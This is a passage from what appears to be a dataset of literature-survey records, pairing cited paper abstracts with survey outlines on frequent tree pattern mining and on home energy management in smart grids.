subtrees. While more interesting patterns can be obtained when mining embedded subtrees, unfortunately mining such embedding relationships can be very costly. In this paper, we propose an efficient approach to tackle the complexity of mining embedded subtrees by utilizing a novel Embedding List representation, Tree Model Guided enumeration, and introducing the Level of Embedding constraint. Thus, when it is too costly to mine all frequent embedded subtrees, one can decrease the level of embedding constraint gradually up to 1, from which all the obtained frequent subtrees are induced subtrees. Our experiments with both synthetic and real datasets against two known algorithms for mining induced and embedded subtrees, FREQT and TreeMiner, demonstrate the effectiveness and the efficiency of the technique. --- paper_title: Efficiently Mining Frequent Embedded Unordered Trees paper_content: Mining frequent trees is very useful in domains like bioinformatics, web mining, mining semi-structured data, and so on. In this paper we introduce SLEUTH, an efficient algorithm for mining frequent, unordered, embedded subtrees in a database of labeled trees. The key contributions of our work are as follows: We give the first algorithm that enumerates all embedded, unordered trees. We propose a new equivalence class extension scheme to generate all candidate trees. We extend the notion of scope-list joins to compute frequency of unordered trees. We conduct performance evaluation on several synthetic and real datasets to show that SLEUTH is an efficient algorithm, which has performance comparable to TreeMiner, that mines only ordered trees. --- paper_title: PrefixSpan,: mining sequential patterns efficiently by prefix-projected pattern growth paper_content: Sequential pattern mining is an important data mining problem with broad applications. It is challenging since one may need to examine a combinatorially explosive number of possible subsequence patterns. Most of the previously developed sequential pattern mining methods follow the methodology of A priori which may substantially reduce the number of combinations to be examined. Howeve6 Apriori still encounters problems when a sequence database is large andor when sequential patterns to be mined are numerous ano we propose a novel sequential pattern mining method, called Prefixspan (i.e., Prefix-projected - Ettern_ mining), which explores prejxprojection in sequential pattern mining. Prefixspan mines the complete set of patterns but greatly reduces the efforts of candidate subsequence generation. Moreover; prefi-projection substantially reduces the size of projected databases and leads to efJicient processing. Our performance study shows that Prefixspan outperforms both the Apriori-based GSP algorithm and another recently proposed method; Frees pan, in mining large sequence data bases. --- paper_title: Mining Induced and Embedded Subtrees in Ordered, Unordered, and Partially-Ordered Trees paper_content: Many data mining problems can be represented with non-linear data structures like trees. In this paper, we introduce a scalable algorithm to mine partially-ordered trees. Our algorithm, POTMiner, is able to identify both induced and embedded subtrees and, as special cases, it can handle both completely ordered and completely unordered trees (i.e. the particular situations existing algorithms address). --- paper_title: Mining Closed and Maximal Frequent Subtrees from Databases of Labeled Rooted Trees paper_content: Tree structures are used extensively in domains such as computational biology, pattern recognition, XML databases, computer networks, and so on. One important problem in mining databases of trees is to find frequently occurring subtrees. Because of the combinatorial explosion, the number of frequent subtrees usually grows exponentially with the size of frequent subtrees and, therefore, mining all frequent subtrees becomes infeasible for large tree sizes. We present CMTreeMiner, a computationally efficient algorithm that discovers only closed and maximal frequent subtrees in a database of labeled rooted trees, where the rooted trees can be either ordered or unordered. The algorithm mines both closed and maximal frequent subtrees by traversing an enumeration tree that systematically enumerates all frequent subtrees. Several techniques are proposed to prune the branches of the enumeration tree that do not correspond to closed or maximal frequent subtrees. Heuristic techniques are used to arrange the order of computation so that relatively expensive computation is avoided as much as possible. We study the performance of our algorithm through extensive experiments, using both synthetic data and data sets from real applications. The experimental results show that our algorithm is very efficient in reducing the search space and quickly discovers all closed and maximal frequent subtrees. --- paper_title: TRIPS and TIDES: new algorithms for tree mining paper_content: Recent research in data mining has progressed from mining frequent itemsets to more general and structured patterns like trees and graphs. In this paper, we address the problem of frequent subtree mining that has proven to be viable in a wide range of applications such as bioinformatics, XML processing, computational linguistics, and web usage mining. We propose novel algorithms to mine frequent subtrees from a database of rooted trees. We evaluate the use of two popular sequential encodings of trees to systematically generate and evaluate the candidate patterns. The proposed approach is very generic and can be used to mine embedded or induced subtrees that can be labeled, unlabeled, ordered, unordered, or edge-labeled. Our algorithms are highly cache-conscious in nature because of the compact and simple array-based data structures we use. Typically, L1 and L2 hit rates above 99% are observed. Experimental evaluation showed that our algorithms can achieve up to several orders of magnitude speedup on real datasets when compared to state-of-the-art tree mining algorithms. --- paper_title: Dryade: a new approach for discovering closed frequent trees in heterogeneous tree databases paper_content: In this paper we present a novel algorithm for discovering tree patterns in a tree database. This algorithm uses a relaxed tree inclusion definition, making the problem more complex (checking tree inclusion is NP-complete), but allowing to mine highly heterogeneous databases. To obtain good performances, our DRYADE algorithm, discovers only closed frequent tree patterns. --- paper_title: UNI3 - efficient algorithm for mining unordered induced subtrees using TMG candidate generation paper_content: Semi-structured data sources are increasingly in use today because of their capability of representing information through more complex structures where semantics and relationships of data objects are more easily expressed. Extraction of frequent sub-structures from such data has found important applications in areas such as Bioinformatics, XML mining, Web mining, scientific data management etc. This paper is concerned with the task of mining frequent unordered induced subtrees from a database of rooted ordered labeled subtrees. Our previous work in the area of frequent subtree mining is characterized by the efficient tree model guided (TMG) candidate enumeration, where candidate subtrees conform to the data's underlying tree structure. We apply the same approach to the unordered case, motivated by the fact that in many applications of frequent subtree mining the order among siblings is not considered important. The proposed UNI3 algorithm considers both transaction based and occurrence match support. Synthetic and real world data are used to evaluate the time performance of our approach in comparison to the well known algorithms developed for the same problem --- paper_title: Mining frequent patterns without candidate generation paper_content: Mining frequent patterns in transaction databases, time-series databases, and many other kinds of databases has been studied popularly in data mining research. Most of the previous studies adopt an Apriori-like candidate set generation-and-test approach. However, candidate set generation is still costly, especially when there exist prolific patterns and/or long patterns. In this study, we propose a novel frequent pattern tree (FP-tree) structure, which is an extended prefix-tree structure for storing compressed, crucial information about frequent patterns, and develop an efficient FP-tree-based mining method, FP-growth, for mining the complete set of frequent patterns by pattern fragment growth. Efficiency of mining is achieved with three techniques: (1) a large database is compressed into a highly condensed, much smaller data structure, which avoids costly, repeated database scans, (2) our FP-tree-based mining adopts a pattern fragment growth method to avoid the costly generation of a large number of candidate sets, and (3) a partitioning-based, divide-and-conquer method is used to decompose the mining task into a set of smaller tasks for mining confined patterns in conditional databases, which dramatically reduces the search space. Our performance study shows that the FP-growth method is efficient and scalable for mining both long and short frequent patterns, and is about an order of magnitude faster than the Apriori algorithm and also faster than some recently reported new frequent pattern mining methods. --- paper_title: TreeFinder: a first step towards XML data mining paper_content: In this paper we consider the problem of searching frequent trees from a collection of tree-structured data modeling XML data. The TreeFinder algorithm aims at finding trees, such that their exact or perturbed copies are frequent in a collection of labelled trees. To cope with complexity issues, TreeFinder is correct but not complete: it finds a subset of actually frequent trees. The default of completeness is experimentally investigated on artificial medium size datasets; it is shown that TreeFinder reaches completeness or falls short for a range of experimental settings. --- paper_title: Discovering Frequent Agreement Subtrees from Phylogenetic Data paper_content: We study a new data mining problem concerning the discovery of frequent agreement subtrees (FASTs) from a set of phylogenetic trees. A phylogenetic tree, or phylogeny, is an unordered tree in which the order among siblings is unimportant. Furthermore, each leaf in the tree has a label representing a taxon (species or organism) name, whereas internal nodes are unlabeled. The tree may have a root, representing the common ancestor of all species in the tree, or may be unrooted. An unrooted phylogeny arises due to the lack of sufficient evidence to infer a common ancestor of the taxa in the tree. The FAST problem addressed here is a natural extension of the maximum agreement subtree (MAST) problem widely studied in the computational phylogenetics community. The paper establishes a framework for tackling the FAST problem for both rooted and unrooted phylogenetic trees using data mining techniques. We first develop a novel canonical form for rooted trees together with a phylogeny-aware tree expansion scheme for generating candidate subtrees level by level. Then, we present an efficient algorithm to find all FASTs in a given set of rooted trees, through an Apriori-like approach. We show the correctness and completeness of the proposed method. Finally, we discuss the extensions of the techniques to unrooted trees. Experimental results demonstrate that the proposed methods work well, and are capable of finding interesting patterns in both synthetic data and real phylogenetic trees. --- paper_title: A quickstart in frequent structure mining can make a difference paper_content: Given a database, structure mining algorithms search for substructures that satisfy constraints such as minimum frequency, minimum confidence, minimum interest and maximum frequency. Examples of substructures include graphs, trees and paths. For these substructures many mining algorithms have been proposed. In order to make graph mining more efficient, we investigate the use of the "quickstart principle", which is based on the fact that these classes of structures are contained in each other, thus allowing for the development of structure mining algorithms that split the search into steps of increasing complexity. We introduce the GrAph/Sequence/Tree extractiON ( Gaston ) algorithm that implements this idea by searching first for frequent paths, then frequent free trees and finally cyclic graphs. We investigate two alternatives for computing the frequency of structures and present experimental results to relate these alternatives. --- paper_title: Efficient data mining for maximal frequent subtrees paper_content: A new type of tree mining is defined, which uncovers maximal frequent induced subtrees from a database of unordered labeled trees. A novel algorithm, PathJoin, is proposed. The algorithm uses a compact data structure, FST-Forest, which compresses the trees and still keeps the original tree structure. PathJoin generates candidate subtrees by joining the frequent paths in FST-Forest. Such candidate subtree generation is localized and thus substantially reduces the number of candidate subtrees. Experiments with synthetic data sets show that the algorithm is effective and efficient. ---
Title: Frequent Tree Pattern Mining: A Survey Section 1: Introduction Description 1: Introduce the motivation behind using tree structures in data mining, outline the aim of the paper, and provide an overview of the organization of the paper. Section 2: Tree Representation Description 2: Explain the canonical tree representation and its importance. Discuss depth-first, breadth-first, and depth-sequence-based codification schemes. Section 3: Tree Patterns Description 3: Define different types of subtrees (bottom-up, induced, embedded, incorporated, subsumed) and describe how they are identified within tree databases. Section 4: Tree Pattern Mining Description 4: Analyze the algorithms proposed for tree pattern mining. Clarify the goals of frequent tree mining and explain the concepts of support and frequency. Section 5: Pattern Mining Strategies Description 5: Outline the two main mining strategies (Apriori-based and FP-Growth-based). Detail the candidate generation and support counting phases. Section 6: Candidate Generation Description 6: Describe various candidate generation techniques including rightmost expansion, equivalence class-based extension, right-and-left tree join, and extension and join methods. Section 7: Support Counting Description 7: Discuss the significance of efficient support counting and introduce different types of occurrence lists and other advanced data structures used for this purpose. Section 8: Tree Mining Algorithms Description 8: Survey specific tree mining algorithms, categorized by the types of trees they handle and the kinds of patterns they identify. Provide a brief overview of individual algorithms and their applications. Section 9: Conclusions Description 9: Summarize the main findings of the survey, discuss the common approaches and techniques used in tree mining algorithms, and highlight future directions in the research area.
A Survey of Home Energy Management Systems in Future Smart Grid Communications
13
--- paper_title: Home Energy Management Systems in Future Smart Grids paper_content: We present a detailed review of various Home Energy Management Schemes (HEM,s). HEM,s will increase savings, reduce peak demand and Pto Average Ratio (PAR). Among various applications of smart grid technologies, home energy management is probably the most important one to be addressed. Various steps have been taken by utilities for efficient energy consumption.New pricing schemes like Time of Use (ToU), Real Time Pricing (RTP), Critical Peak Pricing (CPP), Inclining Block Rates (IBR) etc have been been devised for future smart grids.Home appliances and/or distributed energy resources coordination (Local Generation) along with different pricing schemes leads towards efficient energy consumption. This paper addresses various communication and optimization based residential energy management schemes and different communication and networking technologies involved in these schemes. INDEX TERMS—Smart grid, Home energy management, optimization. --- paper_title: Wireless Sensor Networks for Cost-Efficient Residential Energy Management in the Smart Grid paper_content: Wireless sensor networks (WSNs) will play a key role in the extension of the smart grid towards residential premises, and enable various demand and energy management applications. Efficient demand-supply balance and reducing electricity expenses and carbon emissions will be the immediate benefits of these applications. In this paper, we evaluate the performance of an in-home energy management (iHEM) application. The performance of iHEM is compared with an optimization-based residential energy management (OREM) scheme whose objective is to minimize the energy expenses of the consumers. We show that iHEM decreases energy expenses, reduces the contribution of the consumers to the peak load, reduces the carbon emissions of the household, and its savings are close to OREM. On the other hand, iHEM application is more flexible as it allows communication between the controller and the consumer utilizing the wireless sensor home area network (WSHAN). We evaluate the performance of iHEM under the presence of local energy generation capability, prioritized appliances, and for real-time pricing. We show that iHEM reduces the expenses of the consumers for each case. Furthermore, we show that packet delivery ratio, delay, and jitter of the WSHAN improve as the packet size of the monitoring applications, that also utilize the WSHAN, decreases. --- paper_title: Smart Home Energy Management System for Monitoring and Scheduling of Home Appliances Using Zigbee paper_content: Energy management system for efficient load management is presented in this paper. Proposed method consists of the two main parts. One is the energy management center (EMC) consisting of graphical user interface. EMC shows the runtime data and also maintains the data log for the user along with control of the appliances. Second part of the method is load scheduling which is performed using the single knapsack problem. Results of the EMC are shown using LABVIEW while MATLAB simulations are used to show the results of load scheduling. Hardware model is implemented using human machine interface (HMI). HMI consists of PIC18f4520 of microchip family and zigbee transceiver of MC12311 by Freescale. The microcontroller interface with the zigbee transceiver is on standard RS232 interface. INDEX TERMS—Smart Grid, Energy Management, Zigbee. --- paper_title: Cooperative sensor networks for voltage quality monitoring in smart grids paper_content: The paper intends to give a contribution toward the definition of a fully decentralized voltage quality monitoring architecture by proposing the employment of self organizing sensor networks. According to this para-digm each node can assess both the performances of the monitored site, computed by acquiring local information, and the global performances of the monitored grid section, computed by local exchanges of information with its neighbors nodes. Thanks to this feature each node could automatically detect local voltage quality anomalies. Moreover system operator can assess the system voltage quality index for each grid section by inquiring any node of the corresponding sensors network without the need of a central fusion center acquiring and processing all the node acquisitions. This makes the overall monitoring architecture highly scalable, self-organizing and distributed. --- paper_title: A Survey of Communications and Networking Technologies for Energy Management in Buildings and Home Automation paper_content: With the exploding power consumption in private households and increasing environmental and regulatory restraints, the need to improve the overall efficiency of electrical networks has never been greater. That being said, the most efficient way to minimize the power consumption is by voluntary mitigation of home electric energy consumption, based on energy-awareness and automatic or manual reduction of standby power of idling home appliances. Deploying bi-directional smart meters and home energy management (HEM) agents that provision real-time usage monitoring and remote control, will enable HEM in “smart households.” Furthermore, the traditionally inelastic demand curve has began to change, and these emerging HEM technologies enable consumers (industrial to residential) to respond to the energy market behavior to reduce their consumption at peak prices, to supply reserves on a as-needed basis, and to reduce demand on the electric grid. Because the development of smart grid-related activities has resulted in an increased interest in demand response (DR) and demand side management (DSM) programs, this paper presents some popular DR and DSM initiatives that include planning, implementation and evaluation techniques for reducing energy consumption and peak electricity demand. The paper then focuses on reviewing and distinguishing the various state-of-the-art HEM control and networking technologies, and outlines directions for promoting the shift towards a society with low energy demand and low greenhouse gas emissions. The paper also surveys the existing software and hardware tools, platforms, and test beds for evaluating the performance of the information and communications technologies that are at the core of future smart grids. It is envisioned that this paper will inspire future research and design efforts in developing standardized and user-friendly smart energy monitoring systems that are suitable for wide scale deployment in homes. --- paper_title: Minimizing Electricity Theft Using Smart Meters in AMI paper_content: Global energy crises are increasing every moment. Every one has the attention towards more and more energy production and also trying to save it. Electricity can be produced through many ways which is then synchronized on a main grid for usage. The main issue for which we have written this survey paper is losses in electrical system. Weather these losses are technical or non-technical. Technical losses can be calculated easily, as we discussed in section of mathematical modeling that how to calculate technical losses. Where as nontechnical losses can be evaluated if technical losses are known. Theft in electricity produce non-technical losses. To reduce or control theft one can save his economic resources. Smart meter can be the best option to minimize electricity theft, because of its high security, best efficiency, and excellent resistance towards many of theft ideas in electromechanical meters. So in this paper we have mostly concentrated on theft issues. --- paper_title: Monitoring and Controlling Power using Zigbee Communications paper_content: Smart grid is a modified form of electrical grid where generation, transmission, distribution and customers are not only connected electrically but also through strong communication network with each other as well as with market, operation and service provider. For achieving good communication link among them, it is very necessary to find suitable protocol. In this paper, we discuss different hardware techniques for power monitoring, power management and remote power controlling at home and transmission side and also discuss the suitability of Zigbee for required communication link. Zigbee has major role in monitoring and direct load controlling for efficient power utilization. It covers enough area needed for communication and it works on low data rate of 20Kbps to 250Kbps with minimum power consumption. This paper describes the user friendly control home appliances, power on/off through the internet, PDA using Graphical User Interface (GUI) and through GSM cellular mobile phone. --- paper_title: Wireless Sensor Networks for Cost-Efficient Residential Energy Management in the Smart Grid paper_content: Wireless sensor networks (WSNs) will play a key role in the extension of the smart grid towards residential premises, and enable various demand and energy management applications. Efficient demand-supply balance and reducing electricity expenses and carbon emissions will be the immediate benefits of these applications. In this paper, we evaluate the performance of an in-home energy management (iHEM) application. The performance of iHEM is compared with an optimization-based residential energy management (OREM) scheme whose objective is to minimize the energy expenses of the consumers. We show that iHEM decreases energy expenses, reduces the contribution of the consumers to the peak load, reduces the carbon emissions of the household, and its savings are close to OREM. On the other hand, iHEM application is more flexible as it allows communication between the controller and the consumer utilizing the wireless sensor home area network (WSHAN). We evaluate the performance of iHEM under the presence of local energy generation capability, prioritized appliances, and for real-time pricing. We show that iHEM reduces the expenses of the consumers for each case. Furthermore, we show that packet delivery ratio, delay, and jitter of the WSHAN improve as the packet size of the monitoring applications, that also utilize the WSHAN, decreases. --- paper_title: A System Architecture for Autonomous Demand Side Load Management in Smart Buildings paper_content: This paper presents a system architecture for load management in smart buildings which enables autonomous demand side load management in the smart grid. Being of a layered structure composed of three main modules for admission control, load balancing, and demand response management, this architecture can encapsulate the system functionality, assure the interoperability between various components, allow the integration of different energy sources, and ease maintenance and upgrading. Hence it is capable of handling autonomous energy consumption management for systems with heterogeneous dynamics in multiple time-scales and allows seamless integration of diverse techniques for online operation control, optimal scheduling, and dynamic pricing. The design of a home energy manager based on this architecture is illustrated and the simulation results with Matlab/Simulink confirm the viability and efficiency of the proposed framework. --- paper_title: A Survey of Communications and Networking Technologies for Energy Management in Buildings and Home Automation paper_content: With the exploding power consumption in private households and increasing environmental and regulatory restraints, the need to improve the overall efficiency of electrical networks has never been greater. That being said, the most efficient way to minimize the power consumption is by voluntary mitigation of home electric energy consumption, based on energy-awareness and automatic or manual reduction of standby power of idling home appliances. Deploying bi-directional smart meters and home energy management (HEM) agents that provision real-time usage monitoring and remote control, will enable HEM in “smart households.” Furthermore, the traditionally inelastic demand curve has began to change, and these emerging HEM technologies enable consumers (industrial to residential) to respond to the energy market behavior to reduce their consumption at peak prices, to supply reserves on a as-needed basis, and to reduce demand on the electric grid. Because the development of smart grid-related activities has resulted in an increased interest in demand response (DR) and demand side management (DSM) programs, this paper presents some popular DR and DSM initiatives that include planning, implementation and evaluation techniques for reducing energy consumption and peak electricity demand. The paper then focuses on reviewing and distinguishing the various state-of-the-art HEM control and networking technologies, and outlines directions for promoting the shift towards a society with low energy demand and low greenhouse gas emissions. The paper also surveys the existing software and hardware tools, platforms, and test beds for evaluating the performance of the information and communications technologies that are at the core of future smart grids. It is envisioned that this paper will inspire future research and design efforts in developing standardized and user-friendly smart energy monitoring systems that are suitable for wide scale deployment in homes. --- paper_title: Density Controlled Divide-and-Rule Scheme for Energy Efficient Routing in Wireless Sensor Networks paper_content: Cluster based routing technique is most popular routing technique in Wireless Sensor Networks (WSNs). Due to varying need of WSN applications efficient energy utilization in routing protocols is still a potential area of research. In this research work we introduced a new energy efficient cluster based routing technique. In this technique we tried to overcome the problem of coverage hole and energy hole. In our technique we controlled these problems by introducing density controlled uniform distribution of nodes and fixing optimum number of Cluster Heads (CHs) in each round. Finally we verified our technique by experimental results of MATLAB simulations. --- paper_title: CEEC: Centralized Energy Efficient Clustering A New Routing Protocol for WSNs paper_content: Energy efficient routing protocol for Wireless Sensor Networks (WSNs) is one of the most challenging task for researcher. Hierarchical routing protocols have been proved more energy efficient routing protocols, as compare to flat and location based routing protocols. Heterogeneity of nodes with respect to their energy level, has also added extra lifespan for sensor network. In this paper, we propose a Centralized Energy Efficient Clustering (CEEC) routing protocol. We design the CEEC for three level heterogeneous network. CEEC can also be implemented in multi-level heterogeneity of networks. For initial practical, we design and analyze CEEC for three level advance heterogeneous network. In CEEC, whole network area is divided into three equal regions, in which nodes with same energy are spread in same region. --- paper_title: Wireless Sensor Networks for Cost-Efficient Residential Energy Management in the Smart Grid paper_content: Wireless sensor networks (WSNs) will play a key role in the extension of the smart grid towards residential premises, and enable various demand and energy management applications. Efficient demand-supply balance and reducing electricity expenses and carbon emissions will be the immediate benefits of these applications. In this paper, we evaluate the performance of an in-home energy management (iHEM) application. The performance of iHEM is compared with an optimization-based residential energy management (OREM) scheme whose objective is to minimize the energy expenses of the consumers. We show that iHEM decreases energy expenses, reduces the contribution of the consumers to the peak load, reduces the carbon emissions of the household, and its savings are close to OREM. On the other hand, iHEM application is more flexible as it allows communication between the controller and the consumer utilizing the wireless sensor home area network (WSHAN). We evaluate the performance of iHEM under the presence of local energy generation capability, prioritized appliances, and for real-time pricing. We show that iHEM reduces the expenses of the consumers for each case. Furthermore, we show that packet delivery ratio, delay, and jitter of the WSHAN improve as the packet size of the monitoring applications, that also utilize the WSHAN, decreases. --- paper_title: Wireless Sensor Networks for Cost-Efficient Residential Energy Management in the Smart Grid paper_content: Wireless sensor networks (WSNs) will play a key role in the extension of the smart grid towards residential premises, and enable various demand and energy management applications. Efficient demand-supply balance and reducing electricity expenses and carbon emissions will be the immediate benefits of these applications. In this paper, we evaluate the performance of an in-home energy management (iHEM) application. The performance of iHEM is compared with an optimization-based residential energy management (OREM) scheme whose objective is to minimize the energy expenses of the consumers. We show that iHEM decreases energy expenses, reduces the contribution of the consumers to the peak load, reduces the carbon emissions of the household, and its savings are close to OREM. On the other hand, iHEM application is more flexible as it allows communication between the controller and the consumer utilizing the wireless sensor home area network (WSHAN). We evaluate the performance of iHEM under the presence of local energy generation capability, prioritized appliances, and for real-time pricing. We show that iHEM reduces the expenses of the consumers for each case. Furthermore, we show that packet delivery ratio, delay, and jitter of the WSHAN improve as the packet size of the monitoring applications, that also utilize the WSHAN, decreases. --- paper_title: Wireless Sensor Networks for domestic energy management in smart grids paper_content: Wireless Sensor Networks (WSN) are getting more integrated to our daily lives and smart surroundings as they are being used for health, comfort and safety applications. In smart homes and office environments, WSNs are generally used to increase the inhabitant comfort. As the current energy grid is evolving into a smart grid, where consumers can directly reach and control their consumption, WSNs can take part in domestic energy management systems, as well. In this paper, we propose the Appliance Coordination (ACORD) scheme, that uses the in-home WSN and reduces the cost of energy consumption. The cost of energy increases at peak hours, hence reducing the peak demand is a major concern for utility companies. The ACORD scheme, aims to shift consumer demands to off-peak hours. Appliances use the readily available in-home WSN to deliver consumer requests to the Energy Management Unit (EMU). EMU schedules consumer requests with the goal of reducing the energy bill. We show that ACORD decreases the cost of electricity usage of home appliances significantly. --- paper_title: Optimal Residential Load Control With Price Prediction in Real-Time Electricity Pricing Environments paper_content: Real-time electricity pricing models can potentially lead to economic and environmental advantages compared to the current common flat rates. In particular, they can provide end users with the opportunity to reduce their electricity expenditures by responding to pricing that varies with different times of the day. However, recent studies have revealed that the lack of knowledge among users about how to respond to time-varying prices as well as the lack of effective building automation systems are two major barriers for fully utilizing the potential benefits of real-time pricing tariffs. We tackle these problems by proposing an optimal and automatic residential energy consumption scheduling framework which attempts to achieve a desired trade-off between minimizing the electricity payment and minimizing the waiting time for the operation of each appliance in household in presence of a real-time pricing tariff combined with inclining block rates. Our design requires minimum effort from the users and is based on simple linear programming computations. Moreover, we argue that any residential load control strategy in real-time electricity pricing environments requires price prediction capabilities. This is particularly true if the utility companies provide price information only one or two hours ahead of time. By applying a simple and efficient weighted average price prediction filter to the actual hourly-based price values used by the Illinois Power Company from January 2007 to December 2009, we obtain the optimal choices of the coefficients for each day of the week to be used by the price predictor filter. Simulation results show that the combination of the proposed energy consumption scheduling design and the price predictor filter leads to significant reduction not only in users' payments but also in the resulting peak-to-average ratio in load demand for various load scenarios. Therefore, the deployment of the proposed optimal energy consumption scheduling schemes is beneficial for both end users and utility companies. --- paper_title: Using wireless sensor networks for energy-aware homes in smart grids paper_content: Smart grids aim to integrate recent advances in communications and information technologies to renovate the existing power grid. In smart grids, consumers can generate energy and sell it to the utilities. Moreover, they can avoid consumption during peak hours which helps reducing the peak load on the grid. Energy-aware homes can aid consumers to manage their demand and supply profile. In this paper, we propose Appliance Coordination with Feed In (ACORD-FI) scheme for such energy-aware smart homes. We show that ACORD-FI decreases the cost of energy consumption of home appliances, significantly. --- paper_title: Optimum residential load management strategy for real time pricing (RTP) demand response programs paper_content: This paper presents an optimal load management strategy for residential consumers that utilizes the communication infrastructure of the future smart grid. The strategy considers predictions of electricity prices, energy demand, renewable power production, and power-purchase of energy of the consumer in determining the optimal relationship between hourly electricity prices and the use of different household appliances and electric vehicles in a typical smart house. The proposed strategy is illustrated using two study cases corresponding to a house located in Zaragoza (Spain) for a typical day in summer. Results show that the proposed model allows users to control their diary energy consumption and adapt their electricity bills to their actual economical situation. --- paper_title: Coordinated Scheduling of Residential Distributed Energy Resources to Optimize Smart Home Energy Services paper_content: We describe algorithmic enhancements to a decision-support tool that residential consumers can utilize to optimize their acquisition of electrical energy services. The decision-support tool optimizes energy services provision by enabling end users to first assign values to desired energy services, and then scheduling their available distributed energy resources (DER) to maximize net benefits. We chose particle swarm optimization (PSO) to solve the corresponding optimization problem because of its straightforward implementation and demonstrated ability to generate near-optimal schedules within manageable computation times. We improve the basic formulation of cooperative PSO by introducing stochastic repulsion among the particles. The improved DER schedules are then used to investigate the potential consumer value added by coordinated DER scheduling. This is computed by comparing the end-user costs obtained with the enhanced algorithm simultaneously scheduling all DER, against the costs when each DER schedule is solved separately. This comparison enables the end users to determine whether their mix of energy service needs, available DER and electricity tariff arrangements might warrant solving the more complex coordinated scheduling problem, or instead, decomposing the problem into multiple simpler optimizations. --- paper_title: A Survey of Communications and Networking Technologies for Energy Management in Buildings and Home Automation paper_content: With the exploding power consumption in private households and increasing environmental and regulatory restraints, the need to improve the overall efficiency of electrical networks has never been greater. That being said, the most efficient way to minimize the power consumption is by voluntary mitigation of home electric energy consumption, based on energy-awareness and automatic or manual reduction of standby power of idling home appliances. Deploying bi-directional smart meters and home energy management (HEM) agents that provision real-time usage monitoring and remote control, will enable HEM in “smart households.” Furthermore, the traditionally inelastic demand curve has began to change, and these emerging HEM technologies enable consumers (industrial to residential) to respond to the energy market behavior to reduce their consumption at peak prices, to supply reserves on a as-needed basis, and to reduce demand on the electric grid. Because the development of smart grid-related activities has resulted in an increased interest in demand response (DR) and demand side management (DSM) programs, this paper presents some popular DR and DSM initiatives that include planning, implementation and evaluation techniques for reducing energy consumption and peak electricity demand. The paper then focuses on reviewing and distinguishing the various state-of-the-art HEM control and networking technologies, and outlines directions for promoting the shift towards a society with low energy demand and low greenhouse gas emissions. The paper also surveys the existing software and hardware tools, platforms, and test beds for evaluating the performance of the information and communications technologies that are at the core of future smart grids. It is envisioned that this paper will inspire future research and design efforts in developing standardized and user-friendly smart energy monitoring systems that are suitable for wide scale deployment in homes. --- paper_title: A Survey of Communications and Networking Technologies for Energy Management in Buildings and Home Automation paper_content: With the exploding power consumption in private households and increasing environmental and regulatory restraints, the need to improve the overall efficiency of electrical networks has never been greater. That being said, the most efficient way to minimize the power consumption is by voluntary mitigation of home electric energy consumption, based on energy-awareness and automatic or manual reduction of standby power of idling home appliances. Deploying bi-directional smart meters and home energy management (HEM) agents that provision real-time usage monitoring and remote control, will enable HEM in “smart households.” Furthermore, the traditionally inelastic demand curve has began to change, and these emerging HEM technologies enable consumers (industrial to residential) to respond to the energy market behavior to reduce their consumption at peak prices, to supply reserves on a as-needed basis, and to reduce demand on the electric grid. Because the development of smart grid-related activities has resulted in an increased interest in demand response (DR) and demand side management (DSM) programs, this paper presents some popular DR and DSM initiatives that include planning, implementation and evaluation techniques for reducing energy consumption and peak electricity demand. The paper then focuses on reviewing and distinguishing the various state-of-the-art HEM control and networking technologies, and outlines directions for promoting the shift towards a society with low energy demand and low greenhouse gas emissions. The paper also surveys the existing software and hardware tools, platforms, and test beds for evaluating the performance of the information and communications technologies that are at the core of future smart grids. It is envisioned that this paper will inspire future research and design efforts in developing standardized and user-friendly smart energy monitoring systems that are suitable for wide scale deployment in homes. ---
Title: A Survey of Home Energy Management Systems in Future Smart Grid Communications Section 1: Introduction Description 1: Introduces the traditional power grid, the integration of advanced Information and Communication Technologies (ICT) in smart grids, and the advantages brought about by this integration for efficiency and consumer comfort. Section 2: Home Energy Management and Monetary Cost Minimization Description 2: Discusses the concept of energy management, the importance of HEM systems in reducing energy bills, different pricing schemes, and the environmental benefits of effective energy management. Section 3: Optimization-Based Residential Energy Management (OREM) Description 3: Describes an optimization-based residential energy management model aiming to minimize household electricity costs by scheduling home appliances. Section 4: In-Home Energy Management (iHEM) Description 4: Presents a real-time energy management scheme using smart appliances and communication protocols to coordinate energy usage within homes. Section 5: Appliance Coordination (ACORD) Description 5: Details an energy management scheme designed to shift consumer load to off-peak periods to benefit from Time of Use (ToU) pricing and reduce energy costs. Section 6: Optimal and Automatic Residential Energy Consumption Scheduler Description 6: Introduces an optimization scheme utilizing price predictions and energy scheduling to reduce peak-to-average ratio (PAR) in load demand. Section 7: Appliance Coordination with Feed-In (ACORD-FI) Description 7: Explains an energy management scheme that includes coordination of distributed energy resources (DER) and home appliances to reduce energy bills and greenhouse gas emissions. Section 8: Optimum Load Management (OLM) Strategy Description 8: Outlines an optimization strategy for residential load management, incorporating user interests and activity scheduling to minimize energy costs. Section 9: Decision Support Tool (DsT) Description 9: Describes a tool designed to help users make intelligent decisions about appliance operation and DER coordination to maximize consumer benefits and reduce energy bills. Section 10: Sensors and Control System Description 10: Discusses the role of sensors and control systems in future smart homes for local power generation, energy management, and diagnostics at a micro-level. Section 11: Monitoring and Control Devices Description 11: Explores the challenges and functionalities of monitoring and control devices that provide users with real-time consumption data and control interfaces for HEM systems. Section 12: Intelligent Power Management Rostrum (IPMR) Description 12: Details IPMR as the core of HEM systems, integrating data from sensors, external sources, and local environments to facilitate home automation and power management. Section 13: Challenges for Smart Grid Description 13: Identifies major challenges such as scalability, interdisciplinarity, and security and privacy issues that need to be addressed for the smart grid to function effectively. Section 14: Conclusion Description 14: Summarizes the overall benefits of HEM systems in smart grids, various HEM schemes discussed in the paper, and future prospects for developing more efficient and user-friendly HEM systems.
An introduction and survey of estimation of distribution algorithms
16
